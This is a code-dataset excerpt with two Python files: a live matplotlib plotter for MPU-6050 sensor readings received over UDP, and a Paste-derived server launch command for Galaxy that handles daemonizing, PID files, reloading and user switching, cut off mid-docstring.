source
stringlengths
3
86
python
stringlengths
75
1.04M
plot_realtime.py
#!/usr/bin/env python3
"""Live plotter for MPU-6050 readings streamed as JSON over UDP.

A background thread receives datagrams and keeps a sliding window of
measurements; the main thread redraws three time-series subplots
(acceleration, rotation, gyro) from that window.
"""
import argparse
import collections
import json
import socket
import threading
import time
from typing import NamedTuple

import numpy as np
import matplotlib.pyplot as plt


class Rotation(NamedTuple):
    """Roll/pitch pair (radians, per the axis labels below)."""
    roll: float
    pitch: float


class ThreeVector(NamedTuple):
    """Basic x/y/z vector"""
    x: float
    y: float
    z: float


class Measurement(NamedTuple):
    """MPU 6050 sensor readings"""
    timestamp: float
    temp: float
    rot: Rotation
    gyro: ThreeVector
    acc: ThreeVector

    @classmethod
    def deserialize(cls, data: bytes) -> "Measurement":
        """Parse one JSON datagram into a Measurement.

        The timestamp is the local receive time, not a sensor clock.
        Raises json.JSONDecodeError / KeyError on malformed payloads.
        """
        timestamp = time.time()
        json_data = json.loads(data)
        rot = Rotation(roll=json_data["roll"], pitch=json_data["pitch"])
        gyro = ThreeVector(
            x=json_data["gyro"]["x"],
            y=json_data["gyro"]["y"],
            z=json_data["gyro"]["z"],
        )
        acc = ThreeVector(
            x=json_data["acc"]["x"],
            y=json_data["acc"]["y"],
            z=json_data["acc"]["z"],
        )
        return Measurement(
            timestamp=timestamp,
            temp=json_data["temp"],
            rot=rot,
            gyro=gyro,
            acc=acc,
        )


class UdpListener:
    """Listen for data over UDP"""

    def __init__(self, port: int):
        self._port = port
        self._addr = ("0.0.0.0", port)
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # 1 s timeout so the receive thread can be interrupted/checked.
        self._sock.settimeout(1)
        self._sock.bind(self._addr)
        print(f"Listening on UDP port: {port}")

    def get(self) -> Measurement:
        """Listen for data and parse it.

        Raises socket.timeout if nothing arrives within the timeout.
        """
        raw_data = self._sock.recvfrom(1024)
        return Measurement.deserialize(raw_data[0])

    def close(self):
        self._sock.close()


class DataPlotter:
    """Animate incoming data"""

    ROT = ["roll", "pitch"]

    def __init__(self, port: int, window_s: int):
        self._window_s = window_s
        self._listener = UdpListener(port)
        self._start_time = time.time()
        self._data = collections.deque()
        self._lock = threading.Lock()
        self._update_loop = threading.Thread(daemon=True, target=self._update_data)
        self._update_loop.start()

        # matplotlib stuff
        self._fig, ((self._acc_ax, self._rot_ax),
                    (self._gyro_ax, self._empty)) = plt.subplots(
            2, 2, figsize=(19.2, 10.8), dpi=100)
        self._rot_lines = []
        self._gyro_lines = []
        self._acc_lines = []
        self._rot_series = 2
        self._ga_series = 3
        fontsize = 24
        legend_fontsize = 16
        x_label = "Time since start (s)"

        for i in range(self._rot_series):
            self._rot_lines.append(
                self._rot_ax.plot([], [], label=self.ROT[i])[0])
        # Axis cosmetics are applied once, after the lines exist
        # (the legend needs the labelled lines to be present).
        self._rot_ax.set_xlabel(x_label, fontsize=fontsize)
        self._rot_ax.set_ylabel("Rotation (rad)", fontsize=fontsize)
        self._rot_ax.set_xlim([0, self._window_s])
        self._rot_ax.legend(loc="upper left", fontsize=legend_fontsize)

        for i in range(self._ga_series):
            axis = chr(ord("x") + i)
            self._gyro_lines.append(
                self._gyro_ax.plot([], [], label=f"gyro.{axis}")[0])
            self._acc_lines.append(
                self._acc_ax.plot([], [], label=f"acc.{axis}")[0])
        self._gyro_ax.set_xlabel(x_label, fontsize=fontsize)
        self._gyro_ax.set_ylabel("Gyro (rad/s)", fontsize=fontsize)
        self._gyro_ax.set_xlim([0, self._window_s])
        self._gyro_ax.legend(loc="upper left", fontsize=legend_fontsize)
        self._acc_ax.set_xlabel(x_label, fontsize=fontsize)
        self._acc_ax.set_ylabel("Acceleration (m/s^2)", fontsize=fontsize)
        self._acc_ax.set_xlim([0, self._window_s])
        self._acc_ax.legend(loc="upper left", fontsize=legend_fontsize)

        self._empty.axis("off")
        # FigureCanvas.set_window_title was removed in matplotlib >= 3.6;
        # it lives on the canvas manager now. Fall back for old versions.
        try:
            self._fig.canvas.manager.set_window_title("MPU-6050")
        except AttributeError:
            self._fig.canvas.set_window_title("MPU-6050")
        self._fig.suptitle("MPU-6050 Time Series", fontsize=fontsize)
        self._fig.tight_layout()

    def _update_data(self):
        """Receive loop run on the daemon thread: append + trim window."""
        while True:
            try:
                point = self._listener.get()
            except socket.timeout:
                continue
            with self._lock:
                self._update_data_while_locked(point)

    def _update_data_while_locked(self, point: Measurement):
        # Caller must hold self._lock.
        self._data.append(point)
        now = time.time()
        # Drop everything that fell out of the sliding window.
        while len(self._data):
            if self._data[0].timestamp < now - self._window_s:
                self._data.popleft()
            else:
                break

    def update(self):
        """Redraw all subplots from the current window of data."""
        def _update_subplot(ax, timeseries, lines):
            assert len(timeseries) == len(lines)
            for (line, data) in zip(lines, timeseries):
                line.set_xdata(timestamp)
                line.set_ydata(data)
            # Scroll the x-axis once the window is full.
            if timestamp[-1] >= self._window_s:
                ax.set_xlim([timestamp[0], timestamp[-1]])
            else:
                ax.set_xlim([0, self._window_s])
            min_y = np.min(timeseries)
            min_y -= 0.1 * np.abs(min_y)
            max_y = np.max(timeseries)
            max_y += 0.1 * np.abs(max_y)
            ax.set_ylim([min_y, max_y])

        # Copy under the lock so the receive thread is never blocked
        # for the duration of a redraw.
        with self._lock:
            data = list(self._data)
        if len(data) <= 1:
            return
        timestamp = np.array([d.timestamp - self._start_time for d in data])
        # NOTE(review): sensor acc appears to be in g; the -9.8 factor
        # converts to m/s^2 with a sign flip — confirm against the sender.
        acc_timeseries = -9.8 * np.array([
            np.array([d.acc.x for d in data]),
            np.array([d.acc.y for d in data]),
            np.array([d.acc.z for d in data]),
        ])
        gyro_timeseries = np.array([
            np.array([d.gyro.x for d in data]),
            np.array([d.gyro.y for d in data]),
            np.array([d.gyro.z for d in data]),
        ])
        rot_timeseries = np.array([
            np.array([d.rot.roll for d in data]),
            np.array([d.rot.pitch for d in data]),
        ])
        _update_subplot(self._rot_ax, rot_timeseries, self._rot_lines)
        _update_subplot(self._gyro_ax, gyro_timeseries, self._gyro_lines)
        _update_subplot(self._acc_ax, acc_timeseries, self._acc_lines)
        self._fig.canvas.draw()

    def close(self):
        self._listener.close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-p",
        "--port",
        type=int,
        required=True,
        help="The UDP port to listen for new data packets on.",
    )
    args = parser.parse_args()
    plt.ion()
    plotter = DataPlotter(args.port, 10)
    while True:
        plotter.update()
        # Yield to the GUI event loop; a bare busy-loop pegs a core and
        # never flushes window events in interactive mode.
        plt.pause(0.05)
serve.py
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
#   http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
#   http://www.mems-exchange.org/software/qp/
#   From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized

import atexit
import configparser
import errno
import grp
import logging
import optparse
import os
import pwd
import re
import resource
import signal
import socket
import subprocess
import sys
import textwrap
import threading
import time
from gettext import gettext as _
from logging.config import fileConfig
from typing import Optional

from .loadwsgi import loadapp, loadserver

difflib = None

# ---- from paste.script.bool_optparse --------------------------------

"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``).  Arguments *must* use ``=``.
"""


class BoolOptionParser(optparse.OptionParser):

    def _process_long_opt(self, rargs, values):
        arg = rargs.pop(0)

        # Value explicitly attached to arg?  Pretend it's the next
        # argument.
        if "=" in arg:
            (opt, next_arg) = arg.split("=", 1)
            rargs.insert(0, next_arg)
            had_explicit_value = True
        else:
            opt = arg
            had_explicit_value = False

        opt = self._match_long_opt(opt)
        option = self._long_opt[opt]
        if option.takes_value():
            nargs = option.nargs
            if len(rargs) < nargs:
                if nargs == 1:
                    self.error(_("%s option requires an argument") % opt)
                else:
                    self.error(_("%s option requires %d arguments") % (opt, nargs))
            elif nargs == 1:
                value = rargs.pop(0)
            else:
                value = tuple(rargs[0:nargs])
                del rargs[0:nargs]
        elif had_explicit_value:
            # Boolean option given an explicit =value: accept true-ish and
            # false-ish spellings only.
            value = rargs[0].lower().strip()
            del rargs[0:1]
            if value in ('true', 'yes', 'on', '1', 'y', 't'):
                value = None
            elif value in ('false', 'no', 'off', '0', 'n', 'f'):
                # Don't process
                return
            else:
                self.error(_('%s option takes a boolean value only (true/false)') % opt)
        else:
            value = None

        option.process(opt, value, values, self)


# ---- from paste.script.command --------------------------------------

# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php

class BadCommand(Exception):
    """Raised for user-level command errors; carries a process exit code."""

    def __init__(self, message, exit_code=2):
        self.message = message
        self.exit_code = exit_code
        Exception.__init__(self, message)

    def _get_message(self):
        """Getter for 'message'; needed only to override deprecation in BaseException."""
        return self.__message

    def _set_message(self, value):
        """Setter for 'message'; needed only to override deprecation in BaseException."""
        self.__message = value

    # BaseException.message has been deprecated since Python 2.6.
    # To prevent DeprecationWarning from popping up over this
    # pre-existing attribute, use a new property that takes lookup
    # precedence.
    message = property(_get_message, _set_message)


class NoDefault:
    pass


# run and invoke methods moved below ServeCommand


class Command:
    """Base class for paster-style commands (parse args, validate, run)."""

    def __init__(self, name):
        self.command_name = name

    max_args = None
    max_args_error = 'You must provide no more than %(max_args)s arguments'
    min_args: Optional[int] = None
    min_args_error = 'You must provide at least %(min_args)s arguments'
    required_args = None
    # If this command takes a configuration file, set this to 1 or -1
    # Then if invoked through #! the config file will be put into the positional
    # arguments -- at the beginning with 1, at the end with -1
    takes_config_file: Optional[int] = None

    # Grouped in help messages by this:
    group_name = ''

    required_args = ()
    description: Optional[str] = None
    usage = ''
    hidden = False

    # This is the default verbosity level; --quiet subtracts,
    # --verbose adds:
    default_verbosity = 0

    # This is the default interactive state:
    default_interactive = 0

    return_code = 0

    BadCommand = BadCommand

    # Must define:
    #   parser
    #   summary
    #   command()

    def run(self, args):
        """Parse args, apply defaults, validate counts, then dispatch to command()."""
        self.parse_args(args)

        # Setup defaults:
        for name, default in [('verbose', 0),
                              ('quiet', 0),
                              ('interactive', False),
                              ('overwrite', False)]:
            if not hasattr(self.options, name):
                setattr(self.options, name, default)
        if getattr(self.options, 'simulate', False):
            self.options.verbose = max(self.options.verbose, 1)
        self.interactive = self.default_interactive
        if getattr(self.options, 'interactive', False):
            self.interactive += self.options.interactive
        if getattr(self.options, 'no_interactive', False):
            self.interactive = False
        self.verbose = self.default_verbosity
        self.verbose += self.options.verbose
        self.verbose -= self.options.quiet
        self.simulate = getattr(self.options, 'simulate', False)

        # For #! situations:
        if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
            take = self.takes_config_file
            filename = os.environ.get('PASTE_CONFIG_FILE')
            if take == 1:
                self.args.insert(0, filename)
            elif take == -1:
                self.args.append(filename)
            else:
                assert 0, (
                    "Value takes_config_file must be None, 1, or -1 (not %r)"
                    % take)

        if os.environ.get('PASTE_DEFAULT_QUIET'):
            self.verbose = 0

        # Validate:
        if self.min_args is not None and len(self.args) < self.min_args:
            raise BadCommand(
                self.min_args_error % {'min_args': self.min_args,
                                       'actual_args': len(self.args)})
        if self.max_args is not None and len(self.args) > self.max_args:
            raise BadCommand(
                self.max_args_error % {'max_args': self.max_args,
                                       'actual_args': len(self.args)})
        for var_name, option_name in self.required_args:
            if not getattr(self.options, var_name, None):
                raise BadCommand(
                    'You must provide the option %s' % option_name)
        result = self.command()
        if result is None:
            return self.return_code
        else:
            return result

    def parse_args(self, args):
        if self.usage:
            usage = ' ' + self.usage
        else:
            usage = ''
        self.parser.usage = "%prog [options]{}\n{}".format(
            usage, self.summary)
        self.parser.prog = self._prog_name()
        if self.description:
            desc = self.description
            desc = textwrap.dedent(desc)
            self.parser.description = desc
        self.options, self.args = self.parser.parse_args(args)

    def _prog_name(self):
        return '{} {}'.format(os.path.basename(sys.argv[0]), self.command_name)

    ########################################
    # Utility methods
    ########################################

    def pad(self, s, length, dir='left'):
        """Pad ``s`` with spaces to ``length`` (dir='left' pads on the right)."""
        if len(s) >= length:
            return s
        if dir == 'left':
            return s + ' ' * (length - len(s))
        else:
            return ' ' * (length - len(s)) + s

    def _standard_parser(cls, verbose=True,
                         interactive=False,
                         no_interactive=False,
                         simulate=False,
                         quiet=False,
                         overwrite=False):
        """
        Create a standard ``OptionParser`` instance.

        Typically used like::

            class MyCommand(Command):
                parser = Command.standard_parser()

        Subclasses may redefine ``standard_parser``, so use the
        nearest superclass's class method.
        """
        parser = BoolOptionParser()
        if verbose:
            parser.add_option('-v', '--verbose',
                              action='count',
                              dest='verbose',
                              default=0)
        if quiet:
            parser.add_option('-q', '--quiet',
                              action='count',
                              dest='quiet',
                              default=0)
        if no_interactive:
            parser.add_option('--no-interactive',
                              action="count",
                              dest="no_interactive",
                              default=0)
        if interactive:
            parser.add_option('-i', '--interactive',
                              action='count',
                              dest='interactive',
                              default=0)
        if simulate:
            parser.add_option('-n', '--simulate',
                              action='store_true',
                              dest='simulate',
                              default=False)
        if overwrite:
            parser.add_option('-f', '--overwrite',
                              dest="overwrite",
                              action="store_true",
                              help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
        return parser

    standard_parser = classmethod(_standard_parser)

    def quote_first_command_arg(self, arg):
        """
        There's a bug in Windows when running an executable that's
        located inside a path with a space in it.  This method handles
        that case, or on non-Windows systems or an executable with no
        spaces, it just leaves well enough alone.
        """
        if sys.platform != 'win32' or ' ' not in arg:
            # Problem does not apply:
            return arg
        try:
            import win32api
        except ImportError:
            raise ValueError(
                "The executable %r contains a space, and in order to "
                "handle this issue you must have the win32api module "
                "installed" % arg)
        arg = win32api.GetShortPathName(arg)
        return arg

    def parse_vars(self, args):
        """
        Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
        'b', 'c': 'd'}``
        """
        result = {}
        for arg in args:
            if '=' not in arg:
                raise BadCommand(
                    'Variable assignment %r invalid (no "=")' % arg)
            name, value = arg.split('=', 1)
            result[name] = value
        return result

    def logging_file_config(self, config_file):
        """
        Setup logging via the logging module's fileConfig function with the
        specified ``config_file``, if applicable.

        ConfigParser defaults are specified for the special ``__file__``
        and ``here`` variables, similar to PasteDeploy config loading.
        """
        parser = configparser.ConfigParser()
        parser.read([config_file])
        if parser.has_section('loggers'):
            config_file = os.path.abspath(config_file)
            fileConfig(config_file, dict(__file__=config_file,
                                         here=os.path.dirname(config_file)))


class NotFoundCommand(Command):
    """Fallback command used when an unknown command name is invoked."""

    def run(self, args):
        print('Command %r not known (you may need to run setup.py egg_info)'
              % self.command_name)
        commands = list()
        commands.sort()
        if not commands:
            print('No commands registered.')
            print('Have you installed Paste Script?')
            print('(try running python setup.py develop)')
            return 2
        print('Known commands:')
        longest = max([len(n) for n, c in commands])
        for name, command in commands:
            print(' {} {}'.format(self.pad(name, length=longest),
                                  command.load().summary))
        return 2


# ---- From paste.script.serve ----------------------------------------

MAXFD = 1024

jython = sys.platform.startswith('java')


class DaemonizeException(Exception):
    pass


class ServeCommand(Command):

    min_args = 0
    usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
    takes_config_file = 1
    summary = "Serve the described application"
    description: Optional[str] = """\
    This command serves a web application that uses a paste.deploy
    configuration file for the server and application.

    If start/stop/restart is given, then --daemon is implied, and it will
    start (normal operation), stop (--stop-daemon), or do both.

    You can also include variable assignments like 'http_port=8080'
    and then use %(http_port)s in your config files.
    """

    # used by subclasses that configure apps and servers differently
    requires_config_file = True

    parser = Command.standard_parser(quiet=True)
    parser.add_option('-n', '--app-name',
                      dest='app_name',
                      metavar='NAME',
                      help="Load the named application (default main)")
    parser.add_option('-s', '--server',
                      dest='server',
                      metavar='SERVER_TYPE',
                      help="Use the named server.")
    parser.add_option('--server-name',
                      dest='server_name',
                      metavar='SECTION_NAME',
                      help="Use the named server as defined in the configuration file (default: main)")
    if hasattr(os, 'fork'):
        parser.add_option('--daemon',
                          dest="daemon",
                          action="store_true",
                          help="Run in daemon (background) mode")
    parser.add_option('--pid-file',
                      dest='pid_file',
                      metavar='FILENAME',
                      help="Save PID to file (default to paster.pid if running in daemon mode)")
    parser.add_option('--log-file',
                      dest='log_file',
                      metavar='LOG_FILE',
                      help="Save output to the given log file (redirects stdout)")
    parser.add_option('--reload',
                      dest='reload',
                      action='store_true',
                      help="Use auto-restart file monitor")
    parser.add_option('--reload-interval',
                      dest='reload_interval',
                      default=1,
                      help="Seconds between checking files (low number can cause significant CPU usage)")
    parser.add_option('--monitor-restart',
                      dest='monitor_restart',
                      action='store_true',
                      help="Auto-restart server if it dies")
    parser.add_option('--status',
                      action='store_true',
                      dest='show_status',
                      help="Show the status of the (presumably daemonized) server")
    if hasattr(os, 'setuid'):
        # I don't think these are available on Windows
        parser.add_option('--user',
                          dest='set_user',
                          metavar="USERNAME",
                          help="Set the user (usually only possible when run as root)")
        parser.add_option('--group',
                          dest='set_group',
                          metavar="GROUP",
                          help="Set the group (usually only possible when run as root)")
    parser.add_option('--stop-daemon',
                      dest='stop_daemon',
                      action='store_true',
                      help='Stop a daemonized server (given a PID file, or default paster.pid file)')
    if jython:
        parser.add_option('--disable-jython-reloader',
                          action='store_true',
                          dest='disable_jython_reloader',
                          help="Disable the Jython reloader")

    _scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)

    default_verbosity = 1

    _reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
    _monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'

    possible_subcommands = ('start', 'stop', 'restart', 'status')

    def command(self):
        """Main entry: dispatch start/stop/restart/status, then load & run the app."""
        if self.options.stop_daemon:
            return self.stop_daemon()

        if not hasattr(self.options, 'set_user'):
            # Windows case:
            self.options.set_user = self.options.set_group = None
        # @@: Is this the right stage to set the user at?
        self.change_user_group(
            self.options.set_user, self.options.set_group)

        if self.requires_config_file:
            if not self.args:
                raise BadCommand('You must give a config file')
            app_spec = self.args[0]
            if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
                cmd = self.args[1]
                restvars = self.args[2:]
            else:
                cmd = None
                restvars = self.args[1:]
        else:
            app_spec = ""
            if self.args and self.args[0] in self.possible_subcommands:
                cmd = self.args[0]
                restvars = self.args[1:]
            else:
                cmd = None
                restvars = self.args[:]

        if (getattr(self.options, 'daemon', False)
                and getattr(self.options, 'reload', False)):
            raise BadCommand('The --daemon and --reload options may not be used together')

        jython_monitor = False
        if self.options.reload:
            if jython and not self.options.disable_jython_reloader:
                # JythonMonitor raises the special SystemRestart
                # exception that'll cause the Jython interpreter to
                # reload in the existing Java process (avoiding
                # subprocess startup time)
                try:
                    from paste.reloader import JythonMonitor
                except ImportError:
                    pass
                else:
                    jython_monitor = JythonMonitor(poll_interval=int(
                        self.options.reload_interval))
                    if self.requires_config_file:
                        jython_monitor.watch_file(self.args[0])

            if not jython_monitor:
                if os.environ.get(self._reloader_environ_key):
                    from paste import reloader
                    if self.verbose > 1:
                        print('Running reloading file monitor')
                    reloader.install(int(self.options.reload_interval))
                    if self.requires_config_file:
                        reloader.watch_file(self.args[0])
                else:
                    return self.restart_with_reloader()

        if cmd not in (None, 'start', 'stop', 'restart', 'status'):
            raise BadCommand(
                'Error: must give start|stop|restart (not %s)' % cmd)

        if cmd == 'status' or self.options.show_status:
            return self.show_status()

        if cmd == 'restart' or cmd == 'stop':
            result = self.stop_daemon()
            if result:
                print("Could not stop daemon")
                # It's ok to continue trying to restart if stop_daemon returns
                # a 1, otherwise shortcut and return.
                if cmd == 'restart' and result != 1:
                    return result
                if cmd == 'stop':
                    return result
            self.options.daemon = True

        if cmd == 'start':
            self.options.daemon = True

        app_name = self.options.app_name
        vars = self.parse_vars(restvars)
        if not self._scheme_re.search(app_spec):
            app_spec = 'config:' + app_spec
        server_name = self.options.server_name
        if self.options.server:
            server_spec = 'egg:PasteScript'
            assert server_name is None
            server_name = self.options.server
        else:
            server_spec = app_spec
        base = os.getcwd()

        if getattr(self.options, 'daemon', False):
            if not self.options.pid_file:
                self.options.pid_file = 'paster.pid'
            if not self.options.log_file:
                self.options.log_file = 'paster.log'

        # Ensure the log file is writeable
        if self.options.log_file:
            try:
                writeable_log_file = open(self.options.log_file, 'a')
            except OSError as ioe:
                msg = 'Error: Unable to write to log file: %s' % ioe
                raise BadCommand(msg)
            writeable_log_file.close()

        # Ensure the pid file is writeable
        if self.options.pid_file:
            try:
                writeable_pid_file = open(self.options.pid_file, 'a')
            except OSError as ioe:
                msg = 'Error: Unable to write to pid file: %s' % ioe
                raise BadCommand(msg)
            writeable_pid_file.close()

        if getattr(self.options, 'daemon', False):
            try:
                self.daemonize()
            except DaemonizeException as ex:
                if self.verbose > 0:
                    print(str(ex))
                return

        if (self.options.monitor_restart
                and not os.environ.get(self._monitor_environ_key)):
            return self.restart_with_monitor()

        if self.options.pid_file:
            self.record_pid(self.options.pid_file)

        if self.options.log_file:
            stdout_log = LazyWriter(self.options.log_file, 'a')
            sys.stdout = stdout_log
            sys.stderr = stdout_log
            logging.basicConfig(stream=stdout_log)

        log_fn = app_spec
        if log_fn.startswith('config:'):
            log_fn = app_spec[len('config:'):]
        elif log_fn.startswith('egg:'):
            log_fn = None
        if log_fn:
            log_fn = os.path.join(base, log_fn)
            self.logging_file_config(log_fn)

        server = loadserver(server_spec, name=server_name,
                            relative_to=base, global_conf=vars)

        app = loadapp(app_spec, name=app_name,
                      relative_to=base, global_conf=vars)

        if self.verbose > 0:
            if hasattr(os, 'getpid'):
                msg = 'Starting server in PID %i.' % os.getpid()
            else:
                msg = 'Starting server.'
            print(msg)

        def serve():
            try:
                server(app)
            except (SystemExit, KeyboardInterrupt) as e:
                if self.verbose > 1:
                    raise
                if str(e):
                    msg = ' ' + str(e)
                else:
                    msg = ''
                print('Exiting%s (-v to see traceback)' % msg)
            except AttributeError as e:
                # Capturing bad error response from paste
                if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
                    raise OSError(98, 'Address already in use')
                else:
                    raise AttributeError(e)

        if jython_monitor:
            # JythonMonitor has to be ran from the main thread
            threading.Thread(target=serve).start()
            print('Starting Jython file monitor')
            jython_monitor.periodic_reload()
        else:
            serve()

    def daemonize(self):
        """Double-fork into the background and detach stdio (classic daemon recipe)."""
        pid = live_pidfile(self.options.pid_file)
        if pid:
            raise DaemonizeException(
                "Daemon is already running (PID: %s from PID file %s)"
                % (pid, self.options.pid_file))

        if self.verbose > 0:
            print('Entering daemon mode')
        pid = os.fork()
        if pid:
            # The forked process also has a handle on resources, so we
            # *don't* want proper termination of the process, we just
            # want to exit quick (which os._exit() does)
            os._exit(0)
        # Make this the session leader
        os.setsid()
        # Fork again for good measure!
        pid = os.fork()
        if pid:
            os._exit(0)

        # @@: Should we set the umask and cwd now?

        maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
        if maxfd == resource.RLIM_INFINITY:
            maxfd = MAXFD

        # Iterate through and close all file descriptors.
        for fd in range(0, maxfd):
            try:
                os.close(fd)
            except OSError:  # ERROR, fd wasn't open to begin with (ignored)
                pass

        if hasattr(os, "devnull"):
            REDIRECT_TO = os.devnull
        else:
            REDIRECT_TO = "/dev/null"
        os.open(REDIRECT_TO, os.O_RDWR)  # standard input (0)
        # Duplicate standard input to standard output and standard error.
        os.dup2(0, 1)  # standard output (1)
        os.dup2(0, 2)  # standard error (2)

    def record_pid(self, pid_file):
        """Write our PID to ``pid_file`` and arrange for cleanup at exit."""
        pid = os.getpid()
        if self.verbose > 1:
            print(f'Writing PID {pid} to {pid_file}')
        with open(pid_file, 'w') as f:
            f.write(str(pid))
        atexit.register(_remove_pid_file, pid, pid_file, self.verbose)

    def stop_daemon(self):
        """Stop the daemonized server; returns 0 on success, nonzero otherwise."""
        pid_file = self.options.pid_file or 'paster.pid'
        if not os.path.exists(pid_file):
            print('No PID file exists in %s' % pid_file)
            return 1
        pid = read_pidfile(pid_file)
        if not pid:
            print("Not a valid PID file in %s" % pid_file)
            return 1
        pid = live_pidfile(pid_file)
        if not pid:
            print("PID in %s is not valid (deleting)" % pid_file)
            try:
                os.unlink(pid_file)
            except OSError as e:
                print("Could not delete: %s" % e)
                return 2
            return 1
        for _i in range(10):
            if not live_pidfile(pid_file):
                break
            os.kill(pid, signal.SIGTERM)
            time.sleep(1)
        else:
            print("failed to kill web process %s" % pid)
            return 3
        if os.path.exists(pid_file):
            os.unlink(pid_file)
        return 0

    def show_status(self):
        """Report whether the daemonized server is running (0 = running)."""
        pid_file = self.options.pid_file or 'paster.pid'
        if not os.path.exists(pid_file):
            print('No PID file %s' % pid_file)
            return 1
        file_pid = read_pidfile(pid_file)
        if not file_pid:
            print('No PID in file %s' % pid_file)
            return 1
        pid = live_pidfile(pid_file)
        if not pid:
            # live_pidfile() returned a falsy value here, so report the PID
            # that was read from the file instead of printing "PID None".
            print(f'PID {file_pid} in {pid_file} is not running')
            return 1
        print('Server running in PID %s' % pid)
        return 0

    def restart_with_reloader(self):
        # Propagate the monitor's exit code to our caller (command()
        # returns this value); previously it was silently dropped.
        return self.restart_with_monitor(reloader=True)

    def restart_with_monitor(self, reloader=False):
        """Re-exec ourselves in a subprocess and restart it whenever it dies."""
        if self.verbose > 0:
            if reloader:
                print('Starting subprocess with file monitor')
            else:
                print('Starting subprocess with monitor parent')
        while 1:
            args = [self.quote_first_command_arg(sys.executable)] + sys.argv
            new_environ = os.environ.copy()
            if reloader:
                new_environ[self._reloader_environ_key] = 'true'
            else:
                new_environ[self._monitor_environ_key] = 'true'
            proc = None
            try:
                try:
                    _turn_sigterm_into_systemexit()
                    proc = subprocess.Popen(args, env=new_environ)
                    exit_code = proc.wait()
                    proc = None
                except KeyboardInterrupt:
                    print('^C caught in monitor process')
                    if self.verbose > 1:
                        raise
                    return 1
            finally:
                if proc is not None and hasattr(os, 'kill'):
                    try:
                        os.kill(proc.pid, signal.SIGTERM)
                    except OSError:
                        pass

            if reloader:
                # Reloader always exits with code 3; but if we are
                # a monitor, any exit code will restart
                if exit_code != 3:
                    return exit_code
            if self.verbose > 0:
                print('-' * 20, 'Restarting', '-' * 20)

    def change_user_group(self, user, group):
        """Drop privileges to ``user``/``group`` (names or numeric ids)."""
        if not user and not group:
            return
        uid = gid = None
        if group:
            try:
                gid = int(group)
                group = grp.getgrgid(gid).gr_name
            except ValueError:
                try:
                    entry = grp.getgrnam(group)
                except KeyError:
                    raise BadCommand(
                        "Bad group: %r; no such group exists" % group)
                gid = entry.gr_gid
        if user:
            # Guarded so that --group alone doesn't hit int(None) -> TypeError.
            try:
                uid = int(user)
                user = pwd.getpwuid(uid).pw_name
            except ValueError:
                try:
                    entry = pwd.getpwnam(user)
                except KeyError:
                    raise BadCommand(
                        "Bad username: %r; no such user exists" % user)
                if not gid:
                    gid = entry.pw_gid
                uid = entry.pw_uid
        if self.verbose > 0:
            print('Changing user to {}:{} ({}:{})'.format(
                user, group or '(unknown)', uid, gid))
        if hasattr(os, 'initgroups'):
            os.initgroups(user, gid)
        else:
            os.setgroups([e.gr_gid for e in grp.getgrall()
                          if user in e.gr_mem] + [gid])
        if gid:
            os.setgid(gid)
        if uid:
            os.setuid(uid)


class LazyWriter:

    """
    File-like object that opens a file lazily when it is first written
    to.
    """

    def __init__(self, filename, mode='w'):
        self.filename = filename
        self.fileobj = None
        self.lock = threading.Lock()
        self.mode = mode

    def open(self):
        # Double-checked open so concurrent writers share one file object.
        if self.fileobj is None:
            with self.lock:
                if self.fileobj is None:
                    self.fileobj = open(self.filename, self.mode)
        return self.fileobj

    def write(self, text):
        fileobj = self.open()
        fileobj.write(text)
        fileobj.flush()

    def writelines(self, text):
        fileobj = self.open()
        fileobj.writelines(text)
        fileobj.flush()

    def flush(self):
        self.open().flush()


def live_pidfile(pidfile):
    """(pidfile:str) -> int | None
    Returns an int found in the named file, if there is one,
    and if there is a running process with that process id.
    Return None if no such process exists.
    """
    pid = read_pidfile(pidfile)
    if pid:
        try:
            # Signal 0 just probes for existence/permission.
            os.kill(int(pid), 0)
            return pid
        except OSError as e:
            if e.errno == errno.EPERM:
                return pid
    return None


def read_pidfile(filename):
    """Return the integer PID stored in ``filename``, or None if unreadable."""
    if os.path.exists(filename):
        try:
            with open(filename) as f:
                content = f.read()
            return int(content.strip())
        except (ValueError, OSError):
            return None
    else:
        return None


def _remove_pid_file(written_pid, filename, verbosity):
    """atexit hook: remove our PID file if (and only if) it is still ours."""
    current_pid = os.getpid()
    if written_pid != current_pid:
        # A forked process must be exiting, not the process that
        # wrote the PID file
        return
    if not os.path.exists(filename):
        return
    with open(filename) as f:
        content = f.read().strip()
    try:
        pid_in_file = int(content)
    except ValueError:
        pass
    else:
        if pid_in_file != current_pid:
            print("PID file {} contains {}, not expected PID {}".format(
                filename, pid_in_file, current_pid))
            return
    if verbosity > 0:
        print("Removing PID file %s" % filename)
    try:
        os.unlink(filename)
        return
    except OSError as e:
        # Record, but don't give traceback
        print("Cannot remove PID file: %s" % e)
    # well, at least lets not leave the invalid PID around...
    try:
        with open(filename, 'w') as f:
            f.write('')
    except OSError as e:
        # Fixed: the old message used the invalid format spec {e:e}
        # (TypeError at runtime) and printed "(unknown)" for the filename.
        print(f'Stale PID left in file: {filename} ({e})')
    else:
        print('Stale PID removed')


def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
    """
    This makes sure any open ports are closed.

    Does this by connecting to them until they give connection
